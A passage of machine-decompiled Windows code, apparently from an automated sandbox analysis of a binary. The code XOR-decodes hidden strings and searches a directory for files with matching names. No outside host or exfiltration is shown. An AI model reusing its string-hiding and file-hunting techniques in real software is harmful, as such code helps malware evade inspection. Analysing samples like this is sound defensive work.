                                                                                        									asm("psrld xmm0, xmm7");
                                                                                        									asm("paddd xmm0, xmm1");
                                                                                        									asm("pmulld xmm0, xmm6");
                                                                                        									asm("psubd xmm2, xmm0");
                                                                                        									asm("pshuflw xmm0, xmm2, 0xd8");
                                                                                        									asm("pshufhw xmm0, xmm0, 0xd8");
                                                                                        									asm("pshufd xmm1, xmm0, 0xd8");
                                                                                        									asm("movq xmm0, [0x190000]");
                                                                                        									asm("paddw xmm1, xmm0");
                                                                                        									asm("movq xmm0, [ebp+ecx*2-0x30]");
                                                                                        									asm("pxor xmm1, xmm0");
                                                                                        									asm("movq [ebp+ecx*2-0x30], xmm1");
                                                                                        									_t637 = _t637 + 8;
                                                                                        								} while (_t637 < 0x10);
                                                                                        								if(_t637 < 0x14) {
                                                                                        									asm("o16 nop [eax+eax]");
                                                                                        									do {
                                                                                        										goto L147;
                                                                                        									} while (_t637 < 0x14);
                                                                                        								}
                                                                                        							}
                                                                                        							if(E001829D0( &_v112,  &_v64, 0) != 0) {
                                                                                        								_t443 =  >=  ? _v0 :  &_v0;
                                                                                        								if(E00183250( >=  ? _v0 :  &_v0) == 0) {
                                                                                        									goto L151;
                                                                                        								} else {
                                                                                        								}
                                                                                        							}
                                                                                        							E00182670(_t598,  &_v112, _t773);
                                                                                        							_t733 = _a20;
                                                                                        							if(_t733 >= 8) {
                                                                                        								_t644 = _v0;
                                                                                        								_t734 = 2 + _t733 * 2;
                                                                                        								_t439 = _t644;
                                                                                        								if(_t734 >= 0x1000) {
                                                                                        									_t644 =  *((intOrPtr*)(_t644 - 4));
                                                                                        									_t734 = _t734 + 0x23;
                                                                                        									if(_t439 > 0x1f) {
                                                                                        										__imp___invalid_parameter_noinfo_noreturn();
                                                                                        									}
                                                                                        								}
                                                                                        								_push(_t734);
                                                                                        								E00175733(_t439, _t644);
                                                                                        							}
                                                                                        							 *[fs:0x0] = _v20;
                                                                                        							return E001755F4(_v24 ^ _t819);
                                                                                        						} else {
                                                                                        							_t146 = _t782 + 1; // 0x1
                                                                                        							_t450 = _t146;
                                                                                        							_v1352 = _t450;
                                                                                        							_t775 = _t450 | 0x00000007;
                                                                                        							if(_t775 <= 0x7ffffffe) {
                                                                                        								_t452 = _t646 >> 1;
                                                                                        								_t729 = 0x7ffffffe - _t452;
                                                                                        								if(_t646 <= 0x7ffffffe) {
                                                                                        									_t776 =  <  ? _t452 + _t646 : _t775;
                                                                                        								} else {
                                                                                        									_t776 = 0x7ffffffe;
                                                                                        								}
                                                                                        							} else {
                                                                                        								_t776 = 0x7ffffffe;
                                                                                        							}
                                                                                        							_t148 = _t776 + 1; // 0x7fffffff
                                                                                        							_t455 = E00163260(_t729, _t148);
                                                                                        							_t150 = _t782 + 1; // 0x1
                                                                                        							_v1348 = _t455;
                                                                                        							_t788 = _t782 + _t782;
                                                                                        							_v580 = _t150;
                                                                                        							_v576 = _t776;
                                                                                        							_push(_t788);
                                                                                        							if(_v1344 < 8) {
                                                                                        								memcpy(_t455,  &_v596, ??);
                                                                                        								_t457 = _v1348;
                                                                                        								_t822 = _t822 + 0xc;
                                                                                        								_v1348 = _t457;
                                                                                        								_v596 = _t457;
                                                                                        								 *((intOrPtr*)(_t457 + _t788)) = 0x5c;
                                                                                        								_t789 = _t457;
                                                                                        							} else {
                                                                                        								memcpy(_t455, _v596, ??);
                                                                                        								_t826 = _t822 + 0xc;
                                                                                        								_t703 = _v596;
                                                                                        								 *((intOrPtr*)(_v1348 + _t788)) = 0x5c;
                                                                                        								_t759 = 2 + _v1344 * 2;
                                                                                        								_t555 = _t703;
                                                                                        								if(_t759 >= 0x1000) {
                                                                                        									_t703 =  *((intOrPtr*)(_t703 - 4));
                                                                                        									_t759 = _t759 + 0x23;
                                                                                        									if(_t555 > 0x1f) {
                                                                                        										__imp___invalid_parameter_noinfo_noreturn();
                                                                                        									}
                                                                                        								}
                                                                                        								_push(_t759);
                                                                                        								E00175733(_t555, _t703);
                                                                                        								_t789 = _v1348;
                                                                                        								_t822 = _t826 + 8;
                                                                                        								_v596 = _t789;
                                                                                        							}
                                                                                        							goto L52;
                                                                                        						}
                                                                                        					} else {
                                                                                        						_t136 = _t782 + 1; // 0x1
                                                                                        						_v580 = _t136;
                                                                                        						_t560 =  >=  ? _v596 :  &_v596;
                                                                                        						 *((intOrPtr*)(( >=  ? _v596 :  &_v596) + _t782 * 2)) = 0x5c;
                                                                                        						_t776 = _v576;
                                                                                        						_v1352 = _v580;
                                                                                        						_t789 = _v596;
                                                                                        						L52:
                                                                                        						_v8 = 7;
                                                                                        						_v564 = 0;
                                                                                        						_v548 = 0;
                                                                                        						_v544 = 7;
                                                                                        						_v1344 = 1;
                                                                                        						E0016A8A0( &_v564, _v1352 + 3);
                                                                                        						_t463 =  >=  ? _t789 :  &_v596;
                                                                                        						E001632D0(_t598,  &_v564, _t776,  >=  ? _t789 :  &_v596, _v1352);
                                                                                        						E001632D0(_t598,  &_v564, _t776, "*.*", 3);
                                                                                        						_t467 =  >=  ? _v564 :  &_v564;
                                                                                        						_t468 = FindFirstFileW( >=  ? _v564 :  &_v564,  &_v1340); // executed
                                                                                        						_t735 = _v544;
                                                                                        						_t790 = _t468;
                                                                                        						_v1344 = _t790;
                                                                                        						_v8 = 6;
                                                                                        						if(_t735 >= 8) {
                                                                                        							_t702 = _v564;
                                                                                        							_t758 = 2 + _t735 * 2;
                                                                                        							_t549 = _t702;
                                                                                        							if(_t758 >= 0x1000) {
                                                                                        								_t702 =  *((intOrPtr*)(_t702 - 4));
                                                                                        								_t758 = _t758 + 0x23;
                                                                                        								if(_t549 > 0x1f) {
                                                                                        									__imp___invalid_parameter_noinfo_noreturn();
                                                                                        								}
                                                                                        							}
                                                                                        							_push(_t758);
                                                                                        							E00175733(_t549, _t702);
                                                                                        							_t822 = _t822 + 8;
                                                                                        						}
                                                                                        						_v548 = 0;
                                                                                        						_v544 = 7;
                                                                                        						_v564 = 0;
                                                                                        						if(_t790 != 0xffffffff) {
                                                                                        							_t778 = _v732;
                                                                                        							do {
                                                                                        								if((_v1340.dwFileAttributes & 0x00000010) == 0) {
                                                                                        									_t666 =  &(_v1340.cFileName);
                                                                                        									_t746 = _t666 + 2;
                                                                                        									do {
                                                                                        										_t488 =  *_t666;
                                                                                        										_t666 = _t666 + 2;
                                                                                        									} while (_t488 != 0);
                                                                                        									_t794 =  >=  ? _v748 :  &_v748;
                                                                                        									if(_t778 == _t666 - _t746 >> 1) {
                                                                                        										_t757 = _t778;
                                                                                        										_t700 =  &(_v1340.cFileName);
                                                                                        										if(_t757 == 0) {
                                                                                        											L69:
                                                                                        											_v732 = 0;
                                                                                        											_t546 =  >=  ? _v748 :  &_v748;
                                                                                        											 *((short*)( >=  ? _v748 :  &_v748)) = 0;
                                                                                        											_t778 = _v732;
                                                                                        										} else {
                                                                                        											_t812 = _t794 - _t700;
                                                                                        											while( *((intOrPtr*)(_t700 + _t812)) ==  *_t700) {
                                                                                        												_t700 = _t700 + 2;
                                                                                        												_t757 = _t757 - 1;
                                                                                        												if(_t757 != 0) {
                                                                                        													continue;
                                                                                        												} else {
                                                                                        													goto L69;
                                                                                        												}
                                                                                        												goto L70;
                                                                                        											}
                                                                                        										}
                                                                                        									}
                                                                                        									L70:
                                                                                        									_t669 =  &(_v1340.cFileName);
                                                                                        									_t747 = _t669 + 2;
                                                                                        									asm("o16 nop [eax+eax]");
                                                                                        									do {
                                                                                        										_t489 =  *_t669;
                                                                                        										_t669 = _t669 + 2;
                                                                                        									} while (_t489 != 0);
                                                                                        									_t490 = _v608;
                                                                                        									_t796 =  >=  ? _v624 :  &_v624;
                                                                                        									if(_t490 == _t669 - _t747 >> 1) {
                                                                                        										_t756 = _t490;
                                                                                        										_t698 =  &(_v1340.cFileName);
                                                                                        										if(_t756 == 0) {
                                                                                        											L77:
                                                                                        											_v608 = 0;
                                                                                        											_t542 =  >=  ? _v624 :  &_v624;
                                                                                        											 *((short*)( >=  ? _v624 :  &_v624)) = 0;
                                                                                        										} else {
                                                                                        											_t811 = _t796 - _t698;
                                                                                        											while( *((intOrPtr*)(_t698 + _t811)) ==  *_t698) {
                                                                                        												_t698 = _t698 + 2;
                                                                                        												_t756 = _t756 - 1;
                                                                                        												if(_t756 != 0) {
                                                                                        													continue;
                                                                                        												} else {
                                                                                        													goto L77;
                                                                                        												}
                                                                                        												goto L78;
                                                                                        											}
                                                                                        										}
                                                                                        									}
                                                                                        									L78:
                                                                                        									_t672 =  &(_v1340.cFileName);
                                                                                        									_t748 = _t672 + 2;
                                                                                        									do {
                                                                                        										_t491 =  *_t672;
                                                                                        										_t672 = _t672 + 2;
                                                                                        									} while (_t491 != 0);
                                                                                        									_t492 = _v708;
                                                                                        									_t798 =  >=  ? _v724 :  &_v724;
                                                                                        									if(_t492 == _t672 - _t748 >> 1) {
                                                                                        										_t755 = _t492;
                                                                                        										_t696 =  &(_v1340.cFileName);
                                                                                        										if(_t755 == 0) {
                                                                                        											L85:
                                                                                        											_v708 = 0;
                                                                                        											_t538 =  >=  ? _v724 :  &_v724;
                                                                                        											 *((short*)( >=  ? _v724 :  &_v724)) = 0;
                                                                                        										} else {
                                                                                        											_t810 = _t798 - _t696;
                                                                                        											while( *((intOrPtr*)(_t810 + _t696)) ==  *_t696) {
                                                                                        												_t696 = _t696 + 2;
                                                                                        												_t755 = _t755 - 1;
                                                                                        												if(_t755 != 0) {
                                                                                        													continue;
                                                                                        												} else {
                                                                                        													goto L85;
                                                                                        												}
                                                                                        												goto L86;
                                                                                        											}
                                                                                        										}
                                                                                        									}
                                                                                        									L86:
                                                                                        									_t675 =  &(_v1340.cFileName);
                                                                                        									_t749 = _t675 + 2;
                                                                                        									do {
                                                                                        										_t493 =  *_t675;
                                                                                        										_t675 = _t675 + 2;
                                                                                        									} while (_t493 != 0);
                                                                                        									_t494 = _v684;
                                                                                        									_t800 =  >=  ? _v700 :  &_v700;
                                                                                        									if(_t494 == _t675 - _t749 >> 1) {
                                                                                        										_t754 = _t494;
                                                                                        										_t694 =  &(_v1340.cFileName);
                                                                                        										if(_t754 == 0) {
                                                                                        											L93:
                                                                                        											_v684 = 0;
                                                                                        											_t534 =  >=  ? _v700 :  &_v700;
                                                                                        											 *((short*)( >=  ? _v700 :  &_v700)) = 0;
                                                                                        										} else {
                                                                                        											_t809 = _t800 - _t694;
                                                                                        											while( *((intOrPtr*)(_t809 + _t694)) ==  *_t694) {
                                                                                        												_t694 = _t694 + 2;
                                                                                        												_t754 = _t754 - 1;
                                                                                        												if(_t754 != 0) {
                                                                                        													continue;
                                                                                        												} else {
                                                                                        													goto L93;
                                                                                        												}
                                                                                        												goto L94;
                                                                                        											}
                                                                                        										}
                                                                                        									}
                                                                                        									L94:
                                                                                        									_t678 =  &(_v1340.cFileName);
                                                                                        									_t750 = _t678 + 2;
                                                                                        									do {
                                                                                        										_t495 =  *_t678;
                                                                                        										_t678 = _t678 + 2;
                                                                                        									} while (_t495 != 0);
                                                                                        									_t496 = _v660;
                                                                                        									_t802 =  >=  ? _v676 :  &_v676;
                                                                                        									if(_t496 == _t678 - _t750 >> 1) {
                                                                                        										_t753 = _t496;
                                                                                        										_t692 =  &(_v1340.cFileName);
                                                                                        										if(_t753 == 0) {
                                                                                        											L101:
                                                                                        											_v660 = 0;
                                                                                        											_t530 =  >=  ? _v676 :  &_v676;
                                                                                        											 *((short*)( >=  ? _v676 :  &_v676)) = 0;
                                                                                        										} else {
                                                                                        											_t808 = _t802 - _t692;
                                                                                        											while( *((intOrPtr*)(_t808 + _t692)) ==  *_t692) {
                                                                                        												_t692 = _t692 + 2;
                                                                                        												_t753 = _t753 - 1;
                                                                                        												if(_t753 != 0) {
                                                                                        													continue;
                                                                                        												} else {
                                                                                        													goto L101;
                                                                                        												}
                                                                                        												goto L102;
                                                                                        											}
                                                                                        										}
                                                                                        									}
                                                                                        									L102:
                                                                                        									_t681 =  &(_v1340.cFileName);
                                                                                        									_t751 = _t681 + 2;
                                                                                        									do {
                                                                                        										_t497 =  *_t681;
                                                                                        										_t681 = _t681 + 2;
                                                                                        									} while (_t497 != 0);
                                                                                        									_t498 = _v636;
                                                                                        									_t804 =  >=  ? _v652 :  &_v652;
                                                                                        									if(_t498 == _t681 - _t751 >> 1) {
                                                                                        										_t752 = _t498;
                                                                                        										_t690 =  &(_v1340.cFileName);
                                                                                        										if(_t752 == 0) {
                                                                                        											L109:
                                                                                        											_v636 = 0;
                                                                                        											_t526 =  >=  ? _v652 :  &_v652;
                                                                                        											 *((short*)( >=  ? _v652 :  &_v652)) = 0;
                                                                                        										} else {
                                                                                        											_t807 = _t804 - _t690;
                                                                                        											while( *((intOrPtr*)(_t807 + _t690)) ==  *_t690) {
                                                                                        												_t690 = _t690 + 2;
                                                                                        												_t752 = _t752 - 1;
                                                                                        												if(_t752 != 0) {
                                                                                        													continue;
                                                                                        												} else {
                                                                                        													goto L109;
                                                                                        												}
                                                                                        												goto L110;
                                                                                        											}
                                                                                        										}
                                                                                        									}
                                                                                        									L110:
                                                                                        								} else {
                                                                                        									if(StrCmpIW( &(_v1340.cFileName), ".") != 0) {
                                                                                        										StrCmpIW( &(_v1340.cFileName), L"..");
                                                                                        									}
                                                                                        								}
                                                                                        								_t500 = FindNextFileW(_v1344,  &_v1340); // executed
                                                                                        							} while (_t500 != 0);
                                                                                        							FindClose(_v1344); // executed
                                                                                        							_t507 =  >=  ? _v748 :  &_v748;
                                                                                        							_t790 = _v1356 + 0x94;
                                                                                        							E001632D0(_t598, _v1356 + 0x94, _t778,  >=  ? _v748 :  &_v748, _t778);
                                                                                        							_t510 =  >=  ? _v624 :  &_v624;
                                                                                        							E001632D0(_t598, _v1356 + 0x94, _t778,  >=  ? _v624 :  &_v624, _v608);
                                                                                        							_t513 =  >=  ? _v724 :  &_v724;
                                                                                        							E001632D0(_t598, _v1356 + 0x94, _t778,  >=  ? _v724 :  &_v724, _v708);
                                                                                        							_t516 =  >=  ? _v700 :  &_v700;
                                                                                        							E001632D0(_t598, _v1356 + 0x94, _t778,  >=  ? _v700 :  &_v700, _v684);
                                                                                        							_t519 =  >=  ? _v676 :  &_v676;
                                                                                        							E001632D0(_t598, _t790, _t778,  >=  ? _v676 :  &_v676, _v660);
                                                                                        							_t522 =  >=  ? _v652 :  &_v652;
                                                                                        							E001632D0(_t598, _t790, _t778,  >=  ? _v652 :  &_v652, _v636);
                                                                                        							_t524 = _v1356;
                                                                                        							if( *((intOrPtr*)(_t524 + 0xa4)) != 0) {
                                                                                        								 *(_t524 + 0x90) = 0;
                                                                                        							}
                                                                                        						}
                                                                                        						_t736 = _v576;
                                                                                        						if(_t736 >= 8) {
                                                                                        							_t665 = _v596;
                                                                                        							_t745 = 2 + _t736 * 2;
                                                                                        							_t485 = _t665;
                                                                                        							if(_t745 >= 0x1000) {
                                                                                        								_t665 =  *(_t665 - 4);
                                                                                        								_t745 = _t745 + 0x23;
                                                                                        								if(_t485 > 0x1f) {
                                                                                        									__imp___invalid_parameter_noinfo_noreturn();
                                                                                        								}
                                                                                        							}
                                                                                        							_push(_t745);
                                                                                        							E00175733(_t485, _t665);
                                                                                        							_t822 = _t822 + 8;
                                                                                        						}
                                                                                        						_t737 = _v632;
                                                                                        						if(_t737 >= 8) {
                                                                                        							_t664 = _v652;
                                                                                        							_t744 = 2 + _t737 * 2;
                                                                                        							_t482 = _t664;
                                                                                        							if(_t744 >= 0x1000) {
                                                                                        								_t664 =  *((intOrPtr*)(_t664 - 4));
                                                                                        								_t744 = _t744 + 0x23;
                                                                                        								if(_t482 > 0x1f) {
                                                                                        									__imp___invalid_parameter_noinfo_noreturn();
                                                                                        								}
                                                                                        							}
                                                                                        							_push(_t744);
                                                                                        							E00175733(_t482, _t664);
                                                                                        							_t822 = _t822 + 8;
                                                                                        						}
                                                                                        						_t738 = _v656;
                                                                                        						if(_t738 >= 8) {
                                                                                        							_t663 = _v676;
                                                                                        							_t743 = 2 + _t738 * 2;
                                                                                        							_t479 = _t663;
                                                                                        							if(_t743 >= 0x1000) {
                                                                                        								_t663 =  *((intOrPtr*)(_t663 - 4));
                                                                                        								_t743 = _t743 + 0x23;
                                                                                        								if(_t479 > 0x1f) {
                                                                                        									__imp___invalid_parameter_noinfo_noreturn();
                                                                                        								}
                                                                                        							}
                                                                                        							_push(_t743);
                                                                                        							E00175733(_t479, _t663);
                                                                                        							_t822 = _t822 + 8;
                                                                                        						}
                                                                                        						_t739 = _v680;
                                                                                        						if(_t739 >= 8) {
                                                                                        							_t662 = _v700;
                                                                                        							_t742 = 2 + _t739 * 2;
                                                                                        							_t476 = _t662;
                                                                                        							if(_t742 >= 0x1000) {
                                                                                        								_t662 =  *((intOrPtr*)(_t662 - 4));
                                                                                        								_t742 = _t742 + 0x23;
                                                                                        								if(_t476 > 0x1f) {
                                                                                        									__imp___invalid_parameter_noinfo_noreturn();
                                                                                        								}
                                                                                        							}
                                                                                        							_push(_t742);
                                                                                        							E00175733(_t476, _t662);
                                                                                        							_t822 = _t822 + 8;
                                                                                        						}
                                                                                        						_t740 = _v704;
                                                                                        						if(_t740 >= 8) {
                                                                                        							_t661 = _v724;
                                                                                        							_t741 = 2 + _t740 * 2;
                                                                                        							_t473 = _t661;
                                                                                        							if(_t741 >= 0x1000) {
                                                                                        								_t661 =  *((intOrPtr*)(_t661 - 4));
                                                                                        								_t741 = _t741 + 0x23;
                                                                                        								if(_t473 > 0x1f) {
                                                                                        									__imp___invalid_parameter_noinfo_noreturn();
                                                                                        								}
                                                                                        							}
                                                                                        							_push(_t741);
                                                                                        							E00175733(_t473, _t661);
                                                                                        						}
                                                                                        						E00163190( &_v624, _t790);
                                                                                        						E00163190( &_v748, _t790);
                                                                                        						 *[fs:0x0] = _v16;
                                                                                        						return E001755F4(_v20 ^ _t818);
                                                                                        					}
                                                                                        				}
                                                                                        				L13:
                                                                                        				 *(_t818 + _t781 * 2 - 0x234) =  *(_t818 + _t781 * 2 - 0x234) ^ (0x00000001 - ((0xa0a0a0a1 * _t781 >> 0x00000020) + _t781 >> 0x00000005 >> 0x0000001f) + ((0xa0a0a0a1 * _t781 >> 0x00000020) + _t781 >> 0x00000005)) * 0x00000033 + _t781;
                                                                                        				_t781 = _t781 + 1;
                                                                                        				if(_t781 < 0xd) {
                                                                                        					goto L13;
                                                                                        				} else {
                                                                                        					_v708 = 0;
                                                                                        					_t615 =  &_v568;
                                                                                        					_v704 = 7;
                                                                                        					_v724 = 0;
                                                                                        					_t725 = _t615 + 2;
                                                                                        				}
                                                                                        				goto L15;
                                                                                        				L10:
                                                                                        				_t381 =  *_t608;
                                                                                        				_t608 = _t608 + 2;
                                                                                        				if(_t381 != 0) {
                                                                                        					goto L10;
                                                                                        				} else {
                                                                                        					_push(_t608 - _t721 >> 1);
                                                                                        					E00163540(_t598, _t721, _t773,  &_v564);
                                                                                        					asm("movups xmm0, [0x190894]");
                                                                                        					_t384 =  *0x1908ac; // 0x3f
                                                                                        					_t781 = 0;
                                                                                        					_v8 = 1;
                                                                                        					_v544 = _t384;
                                                                                        					asm("movups [ebp-0x234], xmm0");
                                                                                        					asm("movq xmm0, [0x1908a4]");
                                                                                        					asm("movq [ebp-0x224], xmm0");
                                                                                        					if(_t773 >= 2) {
                                                                                        						asm("movaps xmm2, [0x18ffd0]");
                                                                                        						asm("movaps xmm4, [0x190d30]");
                                                                                        						asm("movaps xmm1, xmm2");
                                                                                        						asm("punpckldq xmm1, xmm2");
                                                                                        						asm("movaps xmm0, xmm2");
                                                                                        						asm("punpckhdq xmm0, xmm2");
                                                                                        						_t781 = 8;
                                                                                        						asm("pmuldq xmm0, xmm4");
                                                                                        						asm("pmuldq xmm1, xmm4");
                                                                                        						asm("shufps xmm1, xmm0, 0xdd");
                                                                                        						asm("paddd xmm1, xmm2");
                                                                                        						asm("movd xmm5, eax");
                                                                                        						asm("psrad xmm1, xmm5");
                                                                                        						asm("movaps xmm0, xmm1");
                                                                                        						asm("movd xmm6, eax");
                                                                                        						asm("psrld xmm0, xmm6");
                                                                                        						asm("paddd xmm0, xmm1");
                                                                                        						asm("pmulld xmm0, [0x190d00]");
                                                                                        						asm("psubd xmm2, xmm0");
                                                                                        						asm("pshuflw xmm0, xmm2, 0xd8");
                                                                                        						asm("movaps xmm2, [0x18ffe0]");
                                                                                        						asm("paddd xmm2, [0x18ffd0]");
                                                                                        						asm("pshufhw xmm0, xmm0, 0xd8");
                                                                                        						asm("pshufd xmm1, xmm0, 0xd8");
                                                                                        						asm("movq xmm0, [0x190000]");
                                                                                        						asm("paddw xmm1, xmm0");
                                                                                        						asm("movq xmm0, [eax]");
                                                                                        						asm("pxor xmm1, xmm0");
                                                                                        						asm("movaps xmm0, xmm2");
                                                                                        						asm("movq [ebp-0x234], xmm1");
                                                                                        						asm("movaps xmm1, xmm2");
                                                                                        						asm("punpckhdq xmm0, xmm2");
                                                                                        						asm("punpckldq xmm1, xmm2");
                                                                                        						asm("pmuldq xmm0, xmm4");
                                                                                        						asm("pmuldq xmm1, xmm4");
                                                                                        						asm("shufps xmm1, xmm0, 0xdd");
                                                                                        						asm("paddd xmm1, xmm2");
                                                                                        						asm("psrad xmm1, xmm5");
                                                                                        						asm("movaps xmm0, xmm1");
                                                                                        						asm("psrld xmm0, xmm6");
                                                                                        						asm("paddd xmm0, xmm1");
                                                                                        						asm("pmulld xmm0, [0x190d00]");
                                                                                        						asm("psubd xmm2, xmm0");
                                                                                        						asm("pshuflw xmm0, xmm2, 0xd8");
                                                                                        						asm("pshufhw xmm0, xmm0, 0xd8");
                                                                                        						asm("pshufd xmm1, xmm0, 0xd8");
                                                                                        						asm("movq xmm0, [0x190000]");
                                                                                        						asm("paddw xmm1, xmm0");
                                                                                        						asm("movq xmm0, [ebp-0x22c]");
                                                                                        						asm("pxor xmm1, xmm0");
                                                                                        						asm("movq [ebp-0x22c], xmm1");
                                                                                        					}
                                                                                        				}
                                                                                        				goto L13;
                                                                                        				L2:
                                                                                        				 *(_t818 + _t780 * 2 - 0x270) =  *(_t818 + _t780 * 2 - 0x270) ^ (0x00000001 - ((0xa0a0a0a1 * _t780 >> 0x00000020) + _t780 >> 0x00000005 >> 0x0000001f) + ((0xa0a0a0a1 * _t780 >> 0x00000020) + _t780 >> 0x00000005)) * 0x00000033 + _t780;
                                                                                        				_t780 = _t780 + 1;
                                                                                        				if(_t780 < 0xf) {
                                                                                        					goto L2;
                                                                                        				} else {
                                                                                        					_v732 = 0;
                                                                                        					_t604 =  &_v628;
                                                                                        					_v728 = 7;
                                                                                        					_v748 = 0;
                                                                                        					_t720 = _t604 + 2;
                                                                                        				}
                                                                                        				goto L4;
                                                                                        			}





























































































































































































                                                                                        0x0016cb90
                                                                                        0x0016cb93
                                                                                        0x0016cb95
                                                                                        0x0016cba0
                                                                                        0x0016cba1
                                                                                        0x0016cba7
                                                                                        0x0016cbac
                                                                                        0x0016cbae
                                                                                        0x0016cbb2
                                                                                        0x0016cbb3
                                                                                        0x0016cbb7
                                                                                        0x0016cbbd
                                                                                        0x0016cbc3
                                                                                        0x0016cbcd
                                                                                        0x0016cbcf
                                                                                        0x0016cbd6
                                                                                        0x0016cbdb
                                                                                        0x0016cbe1
                                                                                        0x0016cbea
                                                                                        0x0016cbf0
                                                                                        0x0016cbfa
                                                                                        0x0016cc01
                                                                                        0x0016cc09
                                                                                        0x0016cc14
                                                                                        0x0016cc1a
                                                                                        0x0016cc21
                                                                                        0x0016cc26
                                                                                        0x0016cc2d
                                                                                        0x0016cc30
                                                                                        0x0016cc34
                                                                                        0x0016cc37
                                                                                        0x0016cc3b
                                                                                        0x0016cc40
                                                                                        0x0016cc45
                                                                                        0x0016cc49
                                                                                        0x0016cc4d
                                                                                        0x0016cc51
                                                                                        0x0016cc55
                                                                                        0x0016cc5e
                                                                                        0x0016cc61
                                                                                        0x0016cc65
                                                                                        0x0016cc69
                                                                                        0x0016cc72
                                                                                        0x0016cc76
                                                                                        0x0016cc7b
                                                                                        0x0016cc82
                                                                                        0x0016cc8a
                                                                                        0x0016cc8f
                                                                                        0x0016cc94
                                                                                        0x0016cc9c
                                                                                        0x0016cca0
                                                                                        0x0016cca4
                                                                                        0x0016cca7
                                                                                        0x0016ccaf
                                                                                        0x0016ccb2
                                                                                        0x0016ccb6
                                                                                        0x0016ccba
                                                                                        0x0016ccbf
                                                                                        0x0016ccc4
                                                                                        0x0016ccc8
                                                                                        0x0016cccc
                                                                                        0x0016ccd0
                                                                                        0x0016ccd3
                                                                                        0x0016ccd7
                                                                                        0x0016ccdb
                                                                                        0x0016cce4
                                                                                        0x0016cce8
                                                                                        0x0016cced
                                                                                        0x0016ccf2
                                                                                        0x0016ccf7
                                                                                        0x0016ccff
                                                                                        0x0016cd07
                                                                                        0x0016cd0b
                                                                                        0x0016cd0b
                                                                                        0x00000000
                                                                                        0x0016cd66
                                                                                        0x0016cd66
                                                                                        0x0016cd66
                                                                                        0x0016cd69
                                                                                        0x0016cd6c
                                                                                        0x0016cd7b
                                                                                        0x0016cd83
                                                                                        0x0016cd90
                                                                                        0x0016cd97
                                                                                        0x0016cd9e
                                                                                        0x0016cda5
                                                                                        0x0016cdad
                                                                                        0x0016cdb5
                                                                                        0x0016cdbb
                                                                                        0x0016cdc0
                                                                                        0x0016cdc6
                                                                                        0x0016cdd2
                                                                                        0x0016cdd9
                                                                                        0x0016cddc
                                                                                        0x0016cde0
                                                                                        0x0016cde3
                                                                                        0x0016cde7
                                                                                        0x0016cdec
                                                                                        0x0016cdf1
                                                                                        0x0016cdf6
                                                                                        0x0016cdfa
                                                                                        0x0016cdfe
                                                                                        0x0016ce02
                                                                                        0x0016ce0b
                                                                                        0x0016ce0e
                                                                                        0x0016ce17
                                                                                        0x0016ce1b
                                                                                        0x0016ce1f
                                                                                        0x0016ce28
                                                                                        0x0016ce2c
                                                                                        0x0016ce31
                                                                                        0x0016ce38
                                                                                        0x0016ce40
                                                                                        0x0016ce45
                                                                                        0x0016ce4a
                                                                                        0x0016ce52
                                                                                        0x0016ce56
                                                                                        0x0016ce5a
                                                                                        0x0016ce5e
                                                                                        0x0016ce61
                                                                                        0x0016ce69
                                                                                        0x0016ce6c
                                                                                        0x0016ce70
                                                                                        0x0016ce74
                                                                                        0x0016ce79
                                                                                        0x0016ce7e
                                                                                        0x0016ce82
                                                                                        0x0016ce86
                                                                                        0x0016ce8a
                                                                                        0x0016ce8d
                                                                                        0x0016ce91
                                                                                        0x0016ce95
                                                                                        0x0016ce9e
                                                                                        0x0016cea2
                                                                                        0x0016cea7
                                                                                        0x0016ceac
                                                                                        0x0016ceb1
                                                                                        0x0016ceb9
                                                                                        0x0016cebd
                                                                                        0x0016cec5
                                                                                        0x0016cec9
                                                                                        0x0016cec9
                                                                                        0x0016ced1
                                                                                        0x0016cef0
                                                                                        0x0016cef8
                                                                                        0x0016cef9
                                                                                        0x0016ced1
                                                                                        0x0016cf00
                                                                                        0x0016cf0a
                                                                                        0x0016cf10
                                                                                        0x0016cf1a
                                                                                        0x0016cf21
                                                                                        0x0016cf21
                                                                                        0x0016d0e3
                                                                                        0x0016d0e3
                                                                                        0x0016d0e3
                                                                                        0x0016d0e6
                                                                                        0x0016d0e9
                                                                                        0x0016d0f8
                                                                                        0x0016d100
                                                                                        0x0016d105
                                                                                        0x0016d10c
                                                                                        0x0016d110
                                                                                        0x0016d117
                                                                                        0x0016d11e
                                                                                        0x0016d123
                                                                                        0x0016d12d
                                                                                        0x0016d133
                                                                                        0x0016d138
                                                                                        0x0016d270
                                                                                        0x0016d28f
                                                                                        0x0016d297
                                                                                        0x0016d298
                                                                                        0x0016d13e
                                                                                        0x0016d13e
                                                                                        0x0016d14a
                                                                                        0x0016d151
                                                                                        0x0016d153
                                                                                        0x0016d15a
                                                                                        0x0016d163
                                                                                        0x0016d167
                                                                                        0x0016d170
                                                                                        0x0016d170
                                                                                        0x0016d177
                                                                                        0x0016d17c
                                                                                        0x0016d180
                                                                                        0x0016d183
                                                                                        0x0016d186
                                                                                        0x0016d18a
                                                                                        0x0016d18e
                                                                                        0x0016d193
                                                                                        0x0016d198
                                                                                        0x0016d19c
                                                                                        0x0016d1a0
                                                                                        0x0016d1a4
                                                                                        0x0016d1a7
                                                                                        0x0016d1ab
                                                                                        0x0016d1af
                                                                                        0x0016d1b4
                                                                                        0x0016d1b8
                                                                                        0x0016d1bd
                                                                                        0x0016d1c2
                                                                                        0x0016d1c7
                                                                                        0x0016d1cf
                                                                                        0x0016d1d3
                                                                                        0x0016d1dc
                                                                                        0x0016d1e0
                                                                                        0x0016d1e4
                                                                                        0x0016d1e9
                                                                                        0x0016d1f2
                                                                                        0x0016d1f6
                                                                                        0x0016d1f9
                                                                                        0x0016d1fc
                                                                                        0x0016d200
                                                                                        0x0016d204
                                                                                        0x0016d209
                                                                                        0x0016d20e
                                                                                        0x0016d212
                                                                                        0x0016d216
                                                                                        0x0016d21a
                                                                                        0x0016d21d
                                                                                        0x0016d221
                                                                                        0x0016d225
                                                                                        0x0016d22a
                                                                                        0x0016d22e
                                                                                        0x0016d233
                                                                                        0x0016d238
                                                                                        0x0016d23d
                                                                                        0x0016d245
                                                                                        0x0016d249
                                                                                        0x0016d252
                                                                                        0x0016d256
                                                                                        0x0016d25f
                                                                                        0x0016d262
                                                                                        0x0016d170
                                                                                        0x0016d138
                                                                                        0x0016d29f
                                                                                        0x0016d2a9
                                                                                        0x0016d2af
                                                                                        0x0016d2b9
                                                                                        0x0016d2c0
                                                                                        0x0016d2c3
                                                                                        0x0016d2c3
                                                                                        0x0016d2c6
                                                                                        0x0016d2c9
                                                                                        0x0016d2d8
                                                                                        0x0016d2e0
                                                                                        0x0016d2ed
                                                                                        0x0016d2f4
                                                                                        0x0016d2f9
